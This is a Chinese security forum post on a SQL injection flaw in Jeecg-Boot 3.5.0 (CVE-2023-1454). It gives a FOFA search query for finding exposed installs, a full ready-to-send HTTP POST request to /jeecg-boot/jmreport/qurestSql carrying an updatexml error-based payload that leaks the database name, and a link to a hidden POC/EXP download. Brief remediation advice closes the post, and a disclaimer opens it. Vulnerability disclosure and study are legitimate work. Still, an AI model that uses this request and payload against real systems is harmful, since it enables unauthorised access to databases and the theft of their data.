请选择 进入手机版 | 继续访问电脑版
查看: 10112|回复: 1

Jeecg-Boot 存在前台SQL注入漏洞(CVE-2023-1454)

[复制链接]
匿名
匿名  发表于 2023-4-12 11:25:56 |阅读模式
免责声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者和本站无关。

1. Jeecg-Boot 简介

jeecgBoot是一款基于BPM的低代码平台!前后端分离架构 SpringBoot 2.x,SpringCloud,Ant Design&Vue,Mybatis-plus,Shiro,JWT,支持微服务。强大的代码生成器让前后端代码一键生成,实现低代码开发!JeecgBoot引领新低代码开发模式 OnlineCoding-> 代码生成器-> 手工MERGE, 帮助Java项目解决70%的重复工作,让开发更多关注业务,既能快速提高效率,节省研发成本,同时又不失灵活性!一系列低代码能力:Online表单、Online报表、Online图表、表单设计、流程设计、报表设计、大屏设计 等等。

2.漏洞描述

jeecg-boot 3.5.0版本存在SQL注入漏洞,该漏洞源于文件 jmreport/qurestSql 存在安全问题, 通过参数 apiSelectId 导致SQL注入。

CVE-2023-1454

CNNVD-202303-1399

3.影响版本

jeecg-boot 3.5.0版本

4.fofa查询语句

[AppleScript] 纯文本查看 复制代码
body="jeecg-boot"


5.漏洞复现

qw1.jpg

漏洞数据包
[AppleScript] 纯文本查看 复制代码
POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: 127.0.0.1
Content-Type: application/json
Content-Length: 126

{"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select database())),1)) or '%%' like '"}


成功爆出数据库名

qw2.jpg

6.POC&EXP

链接: https://pan.baidu.com/s/1VHuaYNR_NShJGEsH_gvHPA
提取码:
游客,如果您要查看本帖隐藏内容请回复




7.整改意见

目前厂商暂未发布修复措施解决此安全问题,建议使用此软件的用户随时关注厂商主页或参考网址以获取解决办法:

https://github.com/jeecgboot/jeecg-boot

回复

使用道具 举报

  • TA的每日心情
    慵懒
    2023-8-22 11:35
  • 签到天数: 3 天

    [LV.2]偶尔看看I

    发表于 2023-8-22 11:37:44 | 显示全部楼层
    我来学习一下
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    上海市通信管理局

    江苏省委网信办

    台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋|

    GMT+8, 2023-12-7 17:28 , Processed in 0.028264 second(s), 16 queries , Gzip On, MemCache On.

    Powered by Discuz!